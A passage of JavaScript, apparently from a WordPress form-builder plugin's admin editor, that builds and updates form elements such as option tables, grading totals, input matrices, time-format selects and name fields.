						adding.setAttribute("other", "1");
						adding.setAttribute("onClick", "set_default('"+num+"','"+index+"','form_id_temp'); show_other_input('"+num+"','form_id_temp');");
					}
					else
					{
						if(document.getElementById(num+"_value_disabledform_id_temp").value=="no")
							adding.setAttribute("value", jQuery(this).find('#el_choices'+index).val());	
						else
							adding.setAttribute("value", jQuery(this).find('#el_option_value'+index).val());	
						adding.setAttribute("onClick", "set_default('"+num+"','"+index+"','form_id_temp')");
					}	
				}
			
				var label_adding = document.createElement('label');
					label_adding.setAttribute("id", num+"_label_element"+index);
					label_adding.setAttribute("class", "ch-rad-label");
					label_adding.setAttribute("for",num+"_elementform_id_temp"+index);
					label_adding.innerHTML= jQuery(this).find('#el_choices'+index).val();
					if(document.getElementById(num+"_option_left_right").value=="right")
						label_adding.style.cssText = "float: none !important";	
					if(jQuery(this).find('#el_option_params'+index).val())
					{
						w_params = jQuery(this).find('#el_option_params'+index).val().split("[where_order_by]");
						label_adding.setAttribute("where", w_params[0]);
						w_params = w_params[1].split("[db_info]");		
						label_adding.setAttribute("order_by", w_params[0]);
						label_adding.setAttribute("db_info", w_params[1]);
					}	
					
					td.appendChild(label_adding);						
					td.appendChild(adding);

				tr_row.appendChild(td);	
				table.appendChild(tr_row);	

				gago++;		
			});
			
		}

		else
		{

			var rows = document.getElementById('edit_for_rowcol').value;
			var columns = parseInt((choeices+1)/rows);
	
			var gago=0;
			var vaxo=0;
			
			jQuery('.change_pos').each(function(key) {
				var index = jQuery(this)[0].id;
			
				if(gago < rows)
				{
					tr_row = document.createElement('div');
					tr_row.setAttribute("id", num+"_element_tr"+key);
					tr_row.style.display = 'table-row';
						
				}
				
				var td = document.createElement('div');
					td.setAttribute("valign", "top");
					td.setAttribute("id", num+"_td_little"+index);
					td.setAttribute("idi", index);
					td.style.display = 'table-cell';
					
				var adding = document.createElement('input');
					adding.setAttribute("type", type);
					adding.setAttribute("id", num+"_elementform_id_temp"+index);	
					if(jQuery(this).find('#el_choices'+index)[0].getAttribute("checked")=="true")
						adding.setAttribute("checked", "checked");		
					if(document.getElementById(num+"_option_left_right").value=="right")
						adding.style.cssText = "float: left !important";			
					
				if(type=='checkbox')
				{
					adding.setAttribute("name", num+"_elementform_id_temp"+index);	
					if(document.getElementById(num+"_allow_otherform_id_temp").value=="yes" && jQuery(this).find('#el_choices'+index).attr('other')=='1')
					{
						adding.setAttribute("value", "");	
						adding.setAttribute("other", "1");
						adding.setAttribute("onclick", "if(set_checked('"+num+"','"+index+"','form_id_temp')) show_other_input('"+num+"','form_id_temp');");
					}
					else
					{
						if(document.getElementById(num+"_value_disabledform_id_temp").value=="no")
							adding.setAttribute("value", jQuery(this).find('#el_choices'+index).val());	
						else
							adding.setAttribute("value", jQuery(this).find('#el_option_value'+index).val());	
						adding.setAttribute("onclick", "set_checked('"+num+"','"+index+"','form_id_temp')");
						
					}	
						
				}
				
				if(type=='radio')
				{
					adding.setAttribute("name", num+"_elementform_id_temp");
					if(document.getElementById(num+"_allow_otherform_id_temp").value=="yes" && jQuery(this).find('#el_choices'+index).attr('other')=='1')
					{
						adding.setAttribute("other", "1");
						adding.setAttribute("onClick", "set_default('"+num+"','"+index+"','form_id_temp'); show_other_input('"+num+"','form_id_temp')");
						
					}
					else
					{
						if(document.getElementById(num+"_value_disabledform_id_temp").value=="no")
							adding.setAttribute("value", jQuery(this).find('#el_choices'+index).val());	
						else
							adding.setAttribute("value", jQuery(this).find('#el_option_value'+index).val());	
						adding.setAttribute("onClick", "set_default('"+num+"','"+index+"','form_id_temp')");
					}	
				}
				
				var label_adding = document.createElement('label');
					label_adding.setAttribute("id", num+"_label_element"+index);
					label_adding.setAttribute("class", "ch-rad-label");
					label_adding.setAttribute("for",num+"_elementform_id_temp"+index);
					label_adding.innerHTML=jQuery(this).find('#el_choices'+index).val();
					if(document.getElementById(num+"_option_left_right").value=="right")
						label_adding.style.cssText = "float: none !important";	
					if(jQuery(this).find('#el_option_params'+index).val())
					{
						w_params = jQuery(this).find('#el_option_params'+index).val().split("[where_order_by]");
						label_adding.setAttribute("where", w_params[0]);
						w_params = w_params[1].split("[db_info]");		
						label_adding.setAttribute("order_by", w_params[0]);
						label_adding.setAttribute("db_info", w_params[1]);
					}	
					
				td.appendChild(label_adding);	
				td.appendChild(adding);
				
				if(gago < rows)
				{
					tr_row.appendChild(td);	
					table.appendChild(tr_row);
				}
				else
				{
					if(vaxo==rows)
					vaxo=0;
					
					tr_row = document.getElementById(num+'_table_little').childNodes[vaxo];
					tr_row.appendChild(td);	
					vaxo++;
				}					
							
				gago++;	
			});
			
			table.setAttribute("for_hor", num+"_hor");
		}
}


function remove_choise(id, num, type)
{
	var choices_td= document.getElementById('choices');
	var div = document.getElementById(id);
		
		choices_td.removeChild(div);


refresh_rowcol(num,type);


refresh_id_name(num, document.getElementById(num+'_typeform_id_temp').value);

}


function remove_choise_price(id, num)
{
var q=0;
	if(document.getElementById(num+'_hor'))
	{
		q=1;
		flow_ver(num);
	}
		
		var table = document.getElementById(num+'_table_little');
		var tr = document.getElementById(num+'_element_tr'+id);
		table.removeChild(tr);
		
		var choices_td= document.getElementById('choices');
		var div = document.getElementById(id);
		
		
		choices_td.removeChild(div);
			
		if(q==1)
		{
			flow_hor(num);
		}
refresh_id_name(num, document.getElementById(num+'_typeform_id_temp').value );

}

function remove_option_price(id, num)
{
		var select_ = document.getElementById(num+'_elementform_id_temp');
		var option = document.getElementById(num+'_option'+id);
			
		select_.removeChild(option);
		
		var choices_td= document.getElementById('choices');
		var div = document.getElementById(id);
		
		choices_td.removeChild(div);
}

function add_grading_items(num){
	for(i=100;i>0;i--)
	{
		if(document.getElementById("el_items"+i))
			break;
	}	

	 m=i+1;
  
	var choices_td= document.getElementById("items");
	var br = document.createElement('br');
		br.setAttribute("id", "britems"+m);
	var el_choices = document.createElement('input');
		el_choices.setAttribute("id", "el_items"+m);
		el_choices.setAttribute("type", "text");
		el_choices.setAttribute("value", "");
		el_choices.setAttribute("class", "fm-field-choice");
		el_choices.setAttribute("onKeyUp", "change_label('"+num+"_label_elementform_id_temp"+m+"', this.value); change_in_value('"+num+"_label_elementform_id_temp"+m+"', this.value)");
	
	var el_choices_remove = document.createElement('img');
		el_choices_remove.setAttribute("id", "el_items"+m+"_remove");
		el_choices_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
		el_choices_remove.style.cssText =  'cursor:pointer;vertical-align:middle; margin:2px';
		el_choices_remove.setAttribute("align", 'top');
		el_choices_remove.setAttribute("onClick", "remove_grading_items('"+m+"','"+num+"')");
	
	choices_td.appendChild(br);
	choices_td.appendChild(el_choices);
	choices_td.appendChild(el_choices_remove);

	refresh_grading_items(num);
	refresh_id_name(num, 'type_grading');
}

function refresh_grading_items(num){

	for(i=100;i>0;i--)
	{
		if(document.getElementById("el_items"+i))
			break;
	}	
	m=i;

	var div = document.getElementById(num+'_elementform_id_temp');
		div.innerHTML='';
   
	for(i=0;i<=m;i++)
	{
		if(document.getElementById("el_items"+i)) {
			var div_grading = document.createElement('div');
				div_grading.setAttribute("id", num+"_element_div"+i);
				div_grading.setAttribute("class", "grading");
		
			var input_item = document.createElement('input');
				input_item.setAttribute("id", num+"_elementform_id_temp_"+i);
				input_item.setAttribute("name", num+"_elementform_id_temp_"+i);
				input_item.setAttribute("onKeyPress", "return check_isnum_or_minus(event)");
				input_item.setAttribute("value", "");					
				input_item.setAttribute("size", "5");					
				input_item.setAttribute("onKeyUp", "sum_grading_values("+num+",'form_id_temp')");
				input_item.setAttribute("onChange", "sum_grading_values("+num+",'form_id_temp')");
					
			var label_item = document.createElement('label');
				label_item.setAttribute("id", num+"_label_elementform_id_temp"+i);
				label_item.setAttribute("class", "ch-rad-label");
				label_item.innerHTML = document.getElementById("el_items"+i).value;	
		  
			div_grading.appendChild(input_item);	
			div_grading.appendChild(label_item);
			div.appendChild(div_grading);
			
		}   
		
	}
	var div_total = document.createElement('div');
		div_total.setAttribute("id", num+"_element_total_divform_id_temp");
		div_total.setAttribute("class", "grading_div");
	var Total = document.createTextNode("Total:");	
	var Seperator = document.createTextNode("/");	
	
	var span_total = document.createElement('span');
		span_total.setAttribute("id", num+"_total_elementform_id_temp");
		span_total.setAttribute("name", num+"_total_elementform_id_temp");
		span_total.innerHTML = document.getElementById(num+'_grading_totalform_id_temp').value;
	
	var span_gum = document.createElement('span');
		span_gum.setAttribute("id", num+"_sum_elementform_id_temp");	
		span_gum.setAttribute("name", num+"_sum_elementform_id_temp");	
		span_gum.innerHTML = 0;
	 
	var span_of_text = document.createElement('span');
		span_of_text.setAttribute("id", num+"_text_elementform_id_temp");	
		span_of_text.setAttribute("name", num+"_text_elementform_id_temp");	
		span_of_text.innerHTML = "";
		 
	div_total.appendChild(Total);
	div_total.appendChild(span_gum);
	div_total.appendChild(Seperator);
	div_total.appendChild(span_total);
	div_total.appendChild(span_of_text);
	div.appendChild(div_total);
}

function remove_grading_items(id, num)
{
	var choices_td= document.getElementById("items");
	
	var el_choices = document.getElementById('el_items'+id);
	var el_choices_remove = document.getElementById('el_items'+id+'_remove');
	var br = document.getElementById('britems'+id);
	
	choices_td.removeChild(el_choices);
	choices_td.removeChild(el_choices_remove);
	choices_td.removeChild(br);

	refresh_grading_items(num);
	refresh_id_name(num, 'type_grading');
}

function sum_grading_values(num,form_id){

	var sum = 0;
	for(var k=0; k<100;k++)
	{
		if(document.getElementById(num+'_element'+form_id+'_'+k))
			if(document.getElementById(num+'_element'+form_id+'_'+k).value)
			{
				sum = sum+parseInt(document.getElementById(num+'_element'+form_id+'_'+k).value);
			}
		
        if(document.getElementById(num+'_total_element'+form_id)){
		if(sum > document.getElementById(num+'_total_element'+form_id).innerHTML){
		
		document.getElementById(num+'_text_element'+form_id).innerHTML =" Total should be less than " + document.getElementById(num+'_total_element'+form_id).innerHTML;
		}
		else{
		document.getElementById(num+'_text_element'+form_id).innerHTML="";
		}
		}
	}
	
	 if(document.getElementById(num+'_sum_element'+form_id))
	document.getElementById(num+'_sum_element'+form_id).innerHTML = sum;

}




function add_to_matrix(type, num){
	for(i=100;i>0;i--)
	{
		if(document.getElementById("el_rows"+i))
			break;
	}
	
	if(type=="rows")
		m=i+1;
	else
		m=i;

	for(i=100;i>0;i--)
	{
		if(document.getElementById("el_columns"+i))
			break;
	}	
	if(type=="columns")
		n=i+1;
	else
		n=i;
	
	var choices_td= document.getElementById(type);
	if(type=="rows") {
		var br = document.createElement('br');
			br.setAttribute("id", "br"+type+m);
		var el_choices = document.createElement('input');
			el_choices.setAttribute("id", "el_"+type+m);
			el_choices.setAttribute("type", "text");
			el_choices.setAttribute("value", "");
			el_choices.setAttribute("class", "fm-field-choice");
			el_choices.setAttribute("onKeyUp", "change_label('"+num+"_label_elementform_id_temp"+m+"_0', this.value); change_in_value('"+num+"_label_elementform_id_temp"+m+"_0', this.value)");
	
		var el_choices_remove = document.createElement('img');
			el_choices_remove.setAttribute("id", "el_"+type+m+"_remove");
			el_choices_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
			el_choices_remove.style.cssText =  'cursor:pointer;vertical-align:middle; margin:2px';
			el_choices_remove.setAttribute("align", 'top');
			el_choices_remove.setAttribute("onClick", "remove_rowcols('"+m+"','"+num+"','"+type+"')");
	
	    choices_td.appendChild(br);
	    choices_td.appendChild(el_choices);
	    choices_td.appendChild(el_choices_remove);
	}
	else
	{
		var br = document.createElement('br');
			br.setAttribute("id", "br"+type+n);
		var el_choices = document.createElement('input');
			el_choices.setAttribute("id", "el_"+type+n);
			el_choices.setAttribute("type", "text");
			el_choices.setAttribute("value", "");
			el_choices.setAttribute("class", "fm-field-choice");
			el_choices.setAttribute("onKeyUp", "change_label('"+num+"_label_elementform_id_temp"+"0_"+n+"', this.value); change_in_value('"+num+"_label_elementform_id_temp"+"0_"+n+"', this.value)");
	
		var el_choices_remove = document.createElement('img');
			el_choices_remove.setAttribute("id", "el_"+type+n+"_remove");
			el_choices_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
			el_choices_remove.style.cssText =  'cursor:pointer;vertical-align:middle; margin:2px';
			el_choices_remove.setAttribute("align", 'top');
			el_choices_remove.setAttribute("onClick", "remove_rowcols('"+n+"','"+num+"','"+type+"')");
	
		choices_td.appendChild(br);
		choices_td.appendChild(el_choices);
		choices_td.appendChild(el_choices_remove);
	}	
	refresh_matrix(num);
}


function refresh_matrix(num){

	for(i=100;i>0;i--)
	{
		if(document.getElementById("el_rows"+i))
			break;
	}	
	m=i;

	for(i=100;i>0;i--)
	{
		if(document.getElementById("el_columns"+i))
			break;
	}	
	n=i;

	var table = document.getElementById(num+'_table_little');
		table.innerHTML='';
	
	var tr0 = document.createElement('div');
		tr0.setAttribute("id", num+"_element_tr0");
		tr0.style.display="table-row";
	
	table.appendChild(tr0);
		
	var td0 = document.createElement('div');
		td0.setAttribute("id", num+"_element_td0_0");		
		td0.style.display="table-cell";
		td0.innerHTML="";		
	tr0.appendChild(td0);

	for(k=1;k<=n;k++)
	{
		if(document.getElementById("el_columns"+k)) {
			var td = document.createElement('div');
				td.setAttribute("id", num+"_element_td0_"+k);	
				td.setAttribute("class", "matrix_");
				td.style.display="table-cell";

			var label_column = document.createElement('label');
				label_column.setAttribute("id", num+"_label_elementform_id_temp"+"0_"+k);
				label_column.setAttribute("name", num+"_label_elementform_id_temp"+"0_"+k);
				label_column.setAttribute("class", "ch-rad-label");
				label_column.setAttribute("for",num+"_elementform_id_temp"+k);	
				label_column.innerHTML=document.getElementById("el_columns"+k).value;	
			
				td.appendChild(label_column);
				tr0.appendChild(td);
		}
	}			

	for(i=1;i<=m;i++)
	{
		if(document.getElementById("el_rows"+i)) {
			var tr = document.createElement('div');
				tr.setAttribute("id", num+"_element_tr"+i);
				tr.style.display="table-row";
			var td0 = document.createElement('div');
				td0.setAttribute("id", num+"_element_td"+i+"_0");		
				td0.setAttribute("class", "matrix_");	
				td0.style.display="table-cell";
				
			var label_row = document.createElement('label');
				label_row.setAttribute("id", num+"_label_elementform_id_temp"+i+"_0");
				label_row.setAttribute("class", "ch-rad-label");
				label_row.setAttribute("for",num+"_elementform_id_temp"+i);	
				label_row.innerHTML=document.getElementById("el_rows"+i).value;	
			
			td0.appendChild(label_row);	
			tr.appendChild(td0);
			table.appendChild(tr);
			
			if(document.getElementById("edit_for_select_input_type").value=="text")
				document.getElementById("el_textbox").removeAttribute("style");
			else
				document.getElementById("el_textbox").style.display="none";
			
			for(k=1;k<=n;k++)
			{
				if(document.getElementById("el_columns"+k)) {
					var td = document.createElement('div');
						td.setAttribute("id", num+"_element_td"+i+"_"+k);	
						td.style.cssText="display:table-cell; text-align:center; padding:5px 0 0 5px;";

					if(document.getElementById("edit_for_select_input_type").value=="select"){
						var select_yes_no = document.createElement('select');
							select_yes_no.setAttribute("id", num+"_select_yes_noform_id_temp"+i+"_"+k);
							select_yes_no.setAttribute("name", num+"_select_yes_noform_id_temp"+i+"_"+k);
						var option_yes_no1 = document.createElement('option');
							option_yes_no1.setAttribute("value", "");
						Nothing = document.createTextNode(" ");
						
						var option_yes_no2 = document.createElement('option');
							option_yes_no2.setAttribute("value", "yes");
						Yes = document.createTextNode("Yes");
					
						var option_yes_no3 = document.createElement('option');
							option_yes_no3.setAttribute("value", "no");
						No = document.createTextNode("No");
					
							option_yes_no1.appendChild(Nothing);
							option_yes_no2.appendChild(Yes);
							option_yes_no3.appendChild(No);
							select_yes_no.appendChild(option_yes_no1);
							select_yes_no.appendChild(option_yes_no2);
							select_yes_no.appendChild(option_yes_no3);
							td.appendChild(select_yes_no);
					}			
					else{		
						var input_of_matrix = document.createElement('input');
							input_of_matrix.setAttribute("id", num+"_input_elementform_id_temp"+i+"_"+k);
							input_of_matrix.setAttribute("align", "center"); 
							input_of_matrix.setAttribute("size", "14"); 							
							input_of_matrix.setAttribute("type", document.getElementById("edit_for_select_input_type").value);	
									
						
						if(document.getElementById("edit_for_select_input_type").value=="radio"){
							input_of_matrix.setAttribute("name", num+"_input_elementform_id_temp"+i);
							input_of_matrix.setAttribute("value", i+"_"+k);
						}else {
							if(document.getElementById("edit_for_select_input_type").value=="checkbox"){
								input_of_matrix.setAttribute("name", num+"_input_elementform_id_temp"+i+"_"+k);
								input_of_matrix.setAttribute("value", 1);
							}
							else{
								document.getElementById( num+"_textbox_sizeform_id_temp").value = document.getElementById("edit_for_label_textbox_size").value;
								
								input_of_matrix.setAttribute("name", num+"_input_elementform_id_temp"+i+"_"+k);
								input_of_matrix.setAttribute("value", '');
								input_of_matrix.style.cssText = "width:"+document.getElementById("edit_for_label_textbox_size").value+"px;";
							}
						}
						td.appendChild(input_of_matrix);
					}
					tr.appendChild(td);
				}
			}
		}   
	}              
}

function remove_rowcols(id, num, type)
{
	var choices_td = document.getElementById(type);
	var el_choices = document.getElementById('el_'+type+id);
	var el_choices_remove = document.getElementById('el_'+type+id+'_remove');
	var br = document.getElementById('br'+type+id);
	
	choices_td.removeChild(el_choices);
	choices_td.removeChild(el_choices_remove);
	choices_td.removeChild(br);

	refresh_matrix(num);
}

function remove_option(id, num)
{
	var select_ = document.getElementById(num+'_elementform_id_temp');
	var option = document.getElementById(num+'_option'+id);
		
	select_.removeChild(option);
	
	var choices_td= document.getElementById('choices');
	var div = document.getElementById(id);
	
	choices_td.removeChild(div);
}

function getIFrameDocument(aID){ 
var rv = null; 
// if contentDocument exists, W3C compliant (Mozilla) 
if (document.getElementById(aID) && document.getElementById(aID).contentDocument){
rv = document.getElementById(aID).contentDocument; 
} else if (document.getElementById(aID)) {
// IE 
rv = document.frames[aID].document; 
} 
return rv; 
}

function delete_last_child() {
  if (document.getElementById("form_maker_editor_ifr")) {
    ifr_id = "form_maker_editor_ifr";
    ifr = getIFrameDocument(ifr_id);
    ifr.body.innerHTML = "";
  }
	document.getElementById('main_editor').style.display="none";
	document.getElementById('form_maker_editor').value="";
	if (document.getElementById('show_table').lastChild) {
		var del1 = document.getElementById('show_table').lastChild;
		var del2 = document.getElementById('edit_table').lastChild;
		var main1 = document.getElementById('show_table');
		var main2 = document.getElementById('edit_table');
		main1.removeChild(del1);
		main2.removeChild(del2);
	}
}

function format_12(num, am_or_pm, w_hh, w_mm, w_ss)
{
    	tr_time1 = document.getElementById(num+'_tr_time1')
    	tr_time2 = document.getElementById(num+'_tr_time2')
   	var td1 = document.createElement('div');
        	td1.setAttribute("id", num+"_am_pm_select");
        	td1.setAttribute("class", "td_am_pm_select");
			td1.style.display="table-cell";
   	var td2 = document.createElement('div');
        	td2.setAttribute("id", num+"_am_pm_label");
        	td2.setAttribute("class", "td_am_pm_select");
			td2.style.display="table-cell";
		
	var am_pm_select = document.createElement('select');
        	am_pm_select.setAttribute("class", "am_pm_select");
        	am_pm_select.setAttribute("name",  num+"_am_pmform_id_temp");
        	am_pm_select.setAttribute("id",  num+"_am_pmform_id_temp");
        	am_pm_select.setAttribute("onchange", "set_sel_am_pm(this)");
		
	var am_option = document.createElement('option');
        	am_option.setAttribute("value", "am");
        	am_option.innerHTML="AM";
		
	var pm_option = document.createElement('option');
        	pm_option.setAttribute("value", "pm");
        	pm_option.innerHTML="PM";
	
	if(am_or_pm=="pm")
	        pm_option.setAttribute("selected", "selected");
	else
	        am_option.setAttribute("selected", "selected");

		
	var am_pm_label = document.createElement('label');
		am_pm_label.setAttribute("class", "mini_label");
		am_pm_label.setAttribute("id", num+"_mini_label_am_pm");
		am_pm_label.innerHTML=w_mini_labels[3];
		
   	am_pm_select.appendChild(am_option);
   	am_pm_select.appendChild(pm_option);
   	td1.appendChild(am_pm_select);
   	td2.appendChild(am_pm_label);
   	tr_time1.appendChild(td1);
   	tr_time2.appendChild(td2);
	document.getElementById(num+'_hhform_id_temp').setAttribute("onKeyPress", "return check_hour(event, '"+num+"_hhform_id_temp',"+"'12'"+")");

    	document.getElementById(num+'_hhform_id_temp').value=w_hh;
    	document.getElementById(num+'_mmform_id_temp').value=w_mm;
	if(document.getElementById(num+'_ssform_id_temp'))
    	document.getElementById(num+'_ssform_id_temp').value=w_ss;
	
refresh_attr(num, 'type_time');

jQuery(document).ready(function() {	
	jQuery("label#"+num+"_mini_label_am_pm").click(function() {		
		if (jQuery(this).children('input').length == 0) {				
			var am_pm = "<input type='text' class='am_pm' size='4' style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";	
				jQuery(this).html(am_pm);							
				jQuery("input.am_pm").focus();			
				jQuery("input.am_pm").blur(function() {	
			var value = jQuery(this).val();			


		jQuery("#"+num+"_mini_label_am_pm").text(value);		
		});	
	}	
	});		
	});	
}

function format_24(num)
{
    	tr_time1 = document.getElementById(num+'_tr_time1')
    	td1 = document.getElementById(num+'_am_pm_select')
    	tr_time2 = document.getElementById(num+'_tr_time2')
    	td2 = document.getElementById(num+'_am_pm_label')
	tr_time1.removeChild(td1);
	tr_time2.removeChild(td2);
	document.getElementById(num+'_hhform_id_temp').setAttribute("onKeyPress", "return check_hour(event, '"+num+"_hhform_id_temp', '23')");
    	document.getElementById(num+'_hhform_id_temp').value="";
    	document.getElementById(num+'_mmform_id_temp').value="";
	if(document.getElementById(num+'_ssform_id_temp'))
    	document.getElementById(num+'_ssform_id_temp').value="";
}

function format_extended(num,w_title_value,w_middle_value,w_title_title,w_middle_title)
{
	w_size=document.getElementById(num+'_element_firstform_id_temp').style.width;
    	tr_name1 = document.getElementById(num+'_tr_name1');
    	tr_name2 = document.getElementById(num+'_tr_name2');
	
   	var td_name_input1 = document.createElement('div');
        	td_name_input1.setAttribute("id", num+"_td_name_input_title");
			td_name_input1.style.display='table-cell';
		
   	var td_name_input4 = document.createElement('div');
        	td_name_input4.setAttribute("id", num+"_td_name_input_middle");
			td_name_input4.style.display='table-cell';
		
   	var td_name_label1 = document.createElement('div');
        	td_name_label1.setAttribute("id", num+"_td_name_label_title");
        	td_name_label1.setAttribute("align", "left");
			td_name_label1.style.display='table-cell';
		
   	var td_name_label4 = document.createElement('div');
        	td_name_label4.setAttribute("id", num+"_td_name_label_middle");
        	td_name_label4.setAttribute("align", "left");
			td_name_label4.style.display='table-cell';
		
	var title = document.createElement('input');
        title.setAttribute("type", 'text');
		
		
		
	    title.style.cssText = "margin: 0px 10px 0px 0px; padding: 0px; width:40px";
	    title.setAttribute("id", num+"_element_titleform_id_temp");
	    title.setAttribute("name", num+"_element_titleform_id_temp");
		if(w_title_value==w_title_title)
		{
		title.setAttribute("value", w_title_title);
		title.setAttribute("class", "input_deactive");
		}
		else
		{
		title.setAttribute("value", w_title_value);
		title.setAttribute("class", "input_active");
		}
		title.setAttribute("title", w_title_title);
		title.setAttribute("onFocus", 'delete_value("'+num+'_element_titleform_id_temp")');
		title.setAttribute("onBlur", 'return_value("'+num+'_element_titleform_id_temp")');
	    title.setAttribute("onChange", "change_value('"+num+"_element_titleform_id_temp')");
		
	var title_label = document.createElement('label');
	    title_label.setAttribute("class", "mini_label");
	    title_label.setAttribute("id", num+"_mini_label_title");
	    title_label.innerHTML= w_mini_labels[0];
		
	var middle = document.createElement('input');
		middle.setAttribute("type", 'text');
		middle.style.cssText = "padding: 0px; width:"+w_size;
		middle.setAttribute("id", num+"_element_middleform_id_temp");
		middle.setAttribute("name", num+"_element_middleform_id_temp");
		if(w_middle_value==w_middle_title)
		{
		middle.setAttribute("value", w_middle_title);
		middle.setAttribute("class", "input_deactive");
		}
		else
		{
		middle.setAttribute("value", w_middle_value);
		middle.setAttribute("class", "input_active");
		}
		middle.setAttribute("title", w_middle_title);
		middle.setAttribute("onFocus", 'delete_value("'+num+'_element_middleform_id_temp")');
		middle.setAttribute("onBlur", 'return_value("'+num+'_element_middleform_id_temp")');
	    middle.setAttribute("onChange", "change_value('"+num+"_element_middleform_id_temp')");
			
	var middle_label = document.createElement('label');
		middle_label.setAttribute("class", "mini_label");
		middle_label.setAttribute("id", num+"_mini_label_middle");
		middle_label.innerHTML=w_mini_labels[3];
		
    	first_input = document.getElementById(num+'_td_name_input_first');
    	last_input = document.getElementById(num+'_td_name_input_last');
    	first_label = document.getElementById(num+'_td_name_label_first');
    	last_label = document.getElementById(num+'_td_name_label_last');
	
      	td_name_input1.appendChild(title);
      	td_name_input4.appendChild(middle);
		
		tr_name1.insertBefore(td_name_input1, first_input);
		tr_name1.insertBefore(td_name_input4, null);
		
      	td_name_label1.appendChild(title_label);
      	td_name_label4.appendChild(middle_label);
		tr_name2.insertBefore(td_name_label1, first_label);
		tr_name2.insertBefore(td_name_label4, null);
		
	var gic1 = document.createTextNode("-");
	var gic2 = document.createTextNode("-");

	var el_first_value_title = document.createElement('input');
                el_first_value_title.setAttribute("id", "el_first_value_title");
                el_first_value_title.setAttribute("type", "text");
                el_first_value_title.setAttribute("value", w_title_title);
                el_first_value_title.style.cssText = "width:50px; margin-left:4px; margin-right:4px";
                el_first_value_title.setAttribute("onKeyUp", "change_input_value(this.value,'"+num+"_element_titleform_id_temp')");

	var el_first_value_middle = document.createElement('input');
                el_first_value_middle.setAttribute("id", "el_first_value_middle");
                el_first_value_middle.setAttribute("type", "text");
                el_first_value_middle.setAttribute("value", w_middle_title);
                el_first_value_middle.style.cssText = "width:100px; margin-left:4px";
                el_first_value_middle.setAttribute("onKeyUp", "change_input_value(this.value,'"+num+"_element_middleform_id_temp')");
				
    el_first_value_first = document.getElementById('el_first_value_first');
	parent=el_first_value_first.parentNode;
	parent.insertBefore(gic1, el_first_value_first);
	parent.insertBefore(el_first_value_title, gic1);
    parent.appendChild(gic2);
    parent.appendChild(el_first_value_middle);
		
refresh_attr(num, 'type_name');
refresh_id_name(num, 'type_name');

jQuery(document).ready(function() {	
	jQuery("label#"+num+"_mini_label_title").click(function() {		
		if (jQuery(this).children('input').length == 0) {				
			var title = "<input type='text' class='title' size='10' style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";	
				jQuery(this).html(title);							
				jQuery("input.title").focus();			
				jQuery("input.title").blur(function() {	
			var value = jQuery(this).val();			


		jQuery("#"+num+"_mini_label_title").text(value);		
		});	
	}	
	});		


	jQuery("label#"+num+"_mini_label_middle").click(function() {	
	if (jQuery(this).children('input').length == 0) {		
		var middle = "<input type='text' class='middle'  style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";	
			jQuery(this).html(middle);			
			jQuery("input.middle").focus();					
			jQuery("input.middle").blur(function() {			
			var value = jQuery(this).val();			
			
			jQuery("#"+num+"_mini_label_middle").text(value);	
		});	
	}	
	});
	});	


}

function format_normal(num)
{
    	tr_name1 = document.getElementById(num+'_tr_name1');
    	tr_name2 = document.getElementById(num+'_tr_name2');
   	 	td_name_input1 = document.getElementById(num+'_td_name_input_title');
		
   		td_name_input4 = document.getElementById(num+'_td_name_input_middle');
		
   		td_name_label1 = document.getElementById(num+'_td_name_label_title');
		
   	 	td_name_label4 =document.getElementById(num+'_td_name_label_middle');
		
		tr_name1.removeChild(td_name_input1);
		tr_name1.removeChild(td_name_input4);
		tr_name2.removeChild(td_name_label1);
		tr_name2.removeChild(td_name_label4);
		
		el_first_value_first = document.getElementById('el_first_value_first');
		parent=el_first_value_first.parentNode;
		
		parent.removeChild( document.getElementById('el_first_value_title').nextSibling);
		parent.removeChild( document.getElementById('el_first_value_title'));
		parent.removeChild( document.getElementById('el_first_value_middle').previousSibling);
		parent.removeChild( document.getElementById('el_first_value_middle'));
refresh_attr(num, 'type_name');
refresh_id_name(num, 'type_name');

}

function type_section_break(i, w_editor) {
	var pos=document.getElementsByName("el_pos");
		pos[0].setAttribute("disabled", "disabled");
		pos[1].setAttribute("disabled", "disabled");
		pos[2].setAttribute("disabled", "disabled");
		
	var sel_el_pos=document.getElementById("sel_el_pos");
		sel_el_pos.setAttribute("disabled", "disabled");

    document.getElementById("element_type").value="type_section_break";
	delete_last_child();
	
	oElement = jQuery('#table_radio');
	oElementoffset = oElement.offset();
	oElementtable = jQuery('.formMakerDiv1_table');
	oElementtableoffset = jQuery('.formMakerDiv1_table').offset();

	iReturnLeft = oElementoffset.left + oElementtableoffset.left;
	iReturnTop = oElementoffset.top;
	
	document.getElementById('main_editor').style.display="block";
	document.getElementById('main_editor').style.left=iReturnLeft+230+"px";
	document.getElementById('main_editor').style.top="120px";
		
		if (document.getElementById("form_maker_editor_ifr") && document.getElementById('form_maker_editor').style.display == "none") {
      ifr_id = "form_maker_editor_ifr";
      ifr = getIFrameDocument(ifr_id);
      ifr.body.innerHTML = w_editor;
    }
		else {
			document.getElementById('form_maker_editor').value = w_editor;
		}
		element = 'div';
     	var div = document.createElement('div');
      	    div.setAttribute("id", "main_div");		
      	var main_td  = document.getElementById('show_table');
      	main_td.appendChild(div);
		
     	var div = document.createElement('div');
      	    div.style.width="500px";				
		document.getElementById('edit_table').appendChild(div);				
}

function type_editor(i, w_editor) {
  document.getElementById("element_type").value="type_editor";
	delete_last_child();

	oElement = jQuery('#table_radio');
	oElementoffset = oElement.offset();
	oElementtable = jQuery('.formMakerDiv1_table');
	oElementtableoffset = jQuery('.formMakerDiv1_table').offset();

	iReturnLeft = oElementoffset.left + oElementtableoffset.left;
	iReturnTop = oElementoffset.top;
	
	document.getElementById('main_editor').style.display="block";
	document.getElementById('main_editor').style.left=iReturnLeft+230+"px";
	document.getElementById('main_editor').style.top="120px";
		
	if (document.getElementById("form_maker_editor_ifr") && document.getElementById('form_maker_editor').style.display == "none") {
		ifr_id = "form_maker_editor_ifr";
		ifr=getIFrameDocument(ifr_id);
		ifr.body.innerHTML=w_editor;
	}
	else {
		document.getElementById('form_maker_editor').value=w_editor;
	}
	
	var div = document.createElement('div');
		div.setAttribute("id", "main_div");		
	var main_td  = document.getElementById('show_table');
		main_td.appendChild(div);
	
	var div = document.createElement('div');
		div.style.width="500px";				
